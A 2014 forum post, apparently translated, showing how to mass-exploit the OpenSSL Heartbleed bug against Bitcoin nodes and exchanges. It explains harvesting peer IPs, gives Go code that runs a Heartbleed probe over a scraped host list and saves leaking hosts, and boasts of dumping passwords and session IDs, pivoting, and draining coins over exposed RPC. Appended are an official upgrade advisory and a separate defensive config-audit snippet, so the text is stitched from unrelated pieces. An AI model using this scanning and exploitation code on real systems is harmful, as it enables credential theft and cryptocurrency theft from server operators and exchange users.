[Entry] How the Heartbleed vulnerability affects Bitcoin...

This post was last edited by btcrobot on 2014-4-21 11:46

How the Heartbleed vulnerability affects Bitcoin... let me show you first-hand just how dangerous Heartbleed is


Disclaimer: you bear the legal responsibility for any consequences arising from this post.


Author: btcrobot

Donate BTC: 1NDnnWCUu926z4wxA3sNBGYWNQD3mKyes8
I originally meant to write something about sidechains, but it didn't feel deep enough, and a girl over at 比特坊 seems to have written one already. I don't like repeating things, so today let's go straight to some security stuff.....
 

Evil Octal divider line............


On Heartbleed: as a Bitcoiner you have to be on alert. The moment I heard of it I thought the bugs, the ideas and the ways to play with it are endless. Taking down xxx would take Martian nerve, and I'm fairly conservative, so I took a roundabout route instead. This post only gives you a taste:


The steps are as follows:


1. Find the IP addresses of the various Bitcoin and altcoin clients, and find the specific port on which SSL is enabled
 


Two ways to get the IPs of hosts running the bitcoin client:
 
1. Download a qt-bitcoin client, open debug.log, and collect the IPs in it
 
2014-04-21 01:53:27 init message: 加载完成
2014-04-21 01:53:27 Initialization result: 1
2014-04-21 01:53:28 ERROR: GetMyExternalIP() : connection closed
2014-04-21 01:53:28 receive version message: /Satoshi:0.8.5/: version 70001, blocks=296904, us=219.147.23.114:1650, them=58.64.155.69:8333, peer=58.64.155.69:8333
2014-04-21 01:53:28 Added time data, samples 2, offset -6 (+0 minutes)
2014-04-21 01:53:33 ERROR: GetMyExternalIP() : connection to 74.208.43.192:80 failed
2014-04-21 01:53:35 receive version message: /Satoshi:0.8.2.2/: version 70001, blocks=296904, us=219.147.23.114:1657, them=192.155.81.62:8333, peer=192.155.81.62:8333
2014-04-21 01:53:35 Added time data, samples 3, offset -13 (+0 minutes)
2014-04-21 01:53:35 No valid UPnP IGDs found
2014-04-21 01:53:35 upnp thread exit
2014-04-21 01:53:36 receive version message: /Satoshi:0.8.5/: version 70001, blocks=296904, us=219.147.23.114:1659, them=194.71.109.94:8333, peer=194.71.109.94:8333
2014-04-21 01:53:36 Added time data, samples 4, offset +12 (+0 minutes)
2014-04-21 01:53:36 socket recv error 10054
2014-04-21 01:53:41 ERROR: GetMyExternalIP() : connection closed
2014-04-21 01:53:48 receive version message: /Satoshi:0.9.99/: version 70002, blocks=296904, us=219.147.23.114:1680, them=71.13.251.162:8333, peer=71.13.251.162:8333
2014-04-21 01:53:48 Added time data, samples 5, offset -12 (+0 minutes)
2014-04-21 01:53:48 nTimeOffset = -6  (+0 minutes)
2014-04-21 01:53:48 ERROR: GetMyExternalIP() : connection to 212.117.175.194:80 failed
2014-04-21 01:53:48 ext-ip thread exit
2014-04-21 01:53:49 receive version message: /Satoshi:0.9.1/: version 70002, blocks=296904, us=219.147.23.114:1681, them=68.151.120.205:8333, peer=68.151.120.205:8333
2014-04-21 01:53:49 Added time data, samples 6, offset -13 (+0 minutes)
2014-04-21 01:53:50 receive version message: /Satoshi:0.9.0/: version 70002, blocks=296904, us=219.147.23.114:1682, them=88.178.92.109:8333, peer=88.178.92.109:8333
2014-04-21 01:53:50 Added time data, samples 7, offset -12 (+0 minutes)
2014-04-21 01:53:50 nTimeOffset = -12  (+0 minutes)

Look at the IPs above; collect them :)
 

2. Use blockchain.info; this one is more powerful. Open https://blockchain.info/zh-cn/connected-nodes

Not only do you get the IPs, you also see at a glance which client version each one runs. As for the versions that carry the vulnerability, well, speechless, heh..



3. Write a small crawler that keeps scraping these IPs automatically and saves them to a file (N GB of it) in the following format. Don't ask me for the code... go play with it yourself
193.109.68.62        
212.3.147.37        
Xxx
Yyy
。。。。
 
 


4. Modify the bleed program to walk through the whole file. OK, here's a bit of code


package main

import (
	"bufio"
	"flag"
	"fmt"
	"log"
	"net/url"
	"os"

	// Assumed import path for the bleed package this snippet builds on
	// (FiloSottile's Heartbleed checker); the post does not show its imports.
	"github.com/FiloSottile/Heartbleed/bleed"
)

// readLines reads a file into a slice of strings, one entry per line.
func readLines(path string) ([]string, error) {
	file, err := os.Open(path)
	if err != nil {
		return nil, err
	}
	defer file.Close()

	var lines []string
	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		lines = append(lines, scanner.Text())
	}
	return lines, scanner.Err()
}

// writeLines writes the lines to the given file, skipping the first skipline entries.
func writeLines(lines []string, path string, skipline int) error {
	file, err := os.Create(path)
	if err != nil {
		return err
	}
	defer file.Close()

	w := bufio.NewWriter(file)
	for i, line := range lines {
		if i < skipline {
			continue
		}
		fmt.Fprintln(w, line)
	}
	return w.Flush()
}

// usage prints the command-line syntax and exits.
func usage(prog string) {
	fmt.Fprintf(os.Stderr, "usage: %s [-starttls proto] host[:port]\n", prog)
	flag.PrintDefaults()
	os.Exit(2)
}

// hostFromArg accepts either host[:port] or a full URL and returns the host part.
func hostFromArg(arg string) string {
	if u, err := url.Parse(arg); err == nil && u.Host != "" {
		return u.Host
	}
	return arg
}

// check probes one target and reports whether it answered with leaked memory.
// bleed.Safe means the heartbeat was answered correctly; any other error is a
// connection or handshake failure, not a verdict.
func check(tgt *bleed.Target) bool {
	out, err := bleed.Heartbleed(tgt, []byte("xxx"))
	switch {
	case err == bleed.Safe:
		//log.Printf("%v - SAFE", tgt.HostIp)
		return false
	case err != nil:
		//log.Printf("%v - ERROR: %v", tgt.HostIp, err)
		return false
	default:
		log.Printf("%v\n", string(out))
		log.Printf("%v - VULNERABLE", tgt.HostIp)
		return true
	}
}

func main() {
	var tgt bleed.Target

	flag.StringVar(&tgt.StartTls, "starttls", "", "use STARTTLS")
	flag.Parse()

	if flag.NArg() < 1 {
		usage(os.Args[0])
	}

	// ip.txt holds the host list, one host or URL per line.
	ips, err := readLines("ip.txt")
	if err != nil {
		log.Fatalf("ip.txt: %v", err)
	}

	// The host given on the command line is checked first, then the file.
	tgt.HostIp = hostFromArg(flag.Arg(0))
	check(&tgt)

	var vulnerable []string
	for _, v := range ips {
		tgt.HostIp = hostFromArg(v)
		if check(&tgt) {
			vulnerable = append(vulnerable, tgt.HostIp)
		}
	}

	if err := writeLines(vulnerable, "vv.txt", 0); err != nil {
		log.Fatalf("vv.txt: %v", err)
	}
}




The results in vv.txt: port 443 on these IPs gets dumped in minutes, and along the way I found a knock-off exchange.
 



The IPs above get dumped straight away..
 
 

Key breakthrough:


Testing one at random:

The password came out... so dangerous...
 



Heartbleed.exe 106.187.43.55




Here is another one, a sessionid




If it's 443 and it's a server, damn, then just collect on a schedule and pattern-match.... then pivot elsewhere, use the web server as a stepping stone, and so on...
If it's SSL+RPC, once the RPC is cracked and no wallet passphrase is set, send one more command to move the bitcoins, oh, my god...

That's how it is for Bitcoin; altcoins go without saying. If 443 has the hole, they get owned in seconds just the same...

The Heartbleed attack on the Bitcoin client applies when the RPC interface is enabled with SSL; in that configuration it can be attacked. That is an option that, for the most part, only server deployments turn on. Individual users should not panic....


OK, I'll say no more; do what you think best, but upgrade right away, there's no harm in upgrading!!!! The ones who matter are website users and exchanges; be careful with router port mappings too..

Disclaimer: purely technical discussion. I suspect the hacker circles all know this already... Posting it, I risk getting flamed from both sides... Just take it in..


OpenSSL Heartbleed vulnerability
11 April 2014
What happened
The version of OpenSSL used by Bitcoin Core software version 0.9.0 and earlier contains a bug that can reveal memory to a remote attacker. See http://heartbleed.com/ for details.
What you should do
Immediately upgrade to Bitcoin Core version 0.9.1 which is linked against OpenSSL version 1.0.1g. If you use the official binaries, you can verify the version of OpenSSL being used from the Bitcoin Core GUI's Debug window (accessed from the Help menu). If you compiled Bitcoin Core yourself or use the Ubuntu PPA, update your system's OpenSSL. Linux users should also upgrade their system's version of OpenSSL.
Android
Android version 4.1.1 is vulnerable to Heartbleed. Upgrade to at least Android 4.1.2 if you can. If you are using Bitcoin Wallet on an Android phone, you should upgrade the app to at least version 3.45.
How serious is the risk
If you are using the Windows version of the Bitcoin Core GUI without a wallet passphrase, it is possible that your wallet could be compromised by clicking on a bitcoin: payment request link. If you are using bitcoind (on Linux, OSX, or Windows), have enabled the -rpcssl option, and allow RPC connections from the Internet, an attacker from a whitelisted (-allowip) IP address can very likely discover the rpcpassword and the last rpc request. It is possible (but unlikely) private keys could be sent to the attacker.
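An added example (not from the post, and not Bitcoin Core code) that turns the advisory's risk description into a check a node operator can run over their own bitcoin.conf: it flags rpcssl=1 and any rpcallowip entry that admits clients beyond loopback (the advisory abbreviates the option as -allowip; the bitcoind setting is rpcallowip), and reports the two together as the exposed combination. The 192.168.1.* wildcard is the pattern form older bitcoind accepted alongside plain IPs and CIDR blocks; the sample config is constructed.

```go
package main

import (
	"bufio"
	"fmt"
	"net"
	"strings"
)

// allowsRemote reports whether an rpcallowip value (plain IP, CIDR block, or a
// bitcoind wildcard such as 192.168.1.*) admits clients that are not on loopback.
func allowsRemote(v string) bool {
	if strings.Contains(v, "*") {
		return true // a wildcard always matches some non-loopback address
	}
	if _, ipnet, err := net.ParseCIDR(v); err == nil {
		return !ipnet.IP.IsLoopback() // masked network address is loopback only if every member is
	}
	ip := net.ParseIP(v)
	return ip == nil || !ip.IsLoopback() // unparseable values are treated as risky
}

// AuditRPCConfig scans bitcoin.conf text for rpcssl=1 and remote rpcallowip entries;
// exposed is true when both are set, the combination the advisory warns about.
func AuditRPCConfig(conf string) (findings []string, exposed bool) {
	var sslOn, remoteOK bool
	sc := bufio.NewScanner(strings.NewReader(conf))
	for sc.Scan() {
		kv := strings.SplitN(sc.Text(), "=", 2)
		if len(kv) != 2 {
			continue
		}
		k, v := strings.TrimSpace(kv[0]), strings.TrimSpace(kv[1])
		if k == "rpcssl" && v == "1" {
			sslOn = true
			findings = append(findings, "rpcssl=1: RPC served through OpenSSL, exposed on bitcoind older than 0.9.1")
		} else if k == "rpcallowip" && allowsRemote(v) {
			remoteOK = true
			findings = append(findings, "rpcallowip="+v+": admits RPC clients beyond loopback")
		}
	}
	return findings, sslOn && remoteOK
}

func main() {
	sample := "rpcssl=1\nrpcallowip=127.0.0.1\nrpcallowip=192.168.1.*\n" // constructed sample config
	findings, exposed := AuditRPCConfig(sample)
	fmt.Println(strings.Join(findings, "\n"), "\nexposed to the Heartbleed RPC leak:", exposed)
}
```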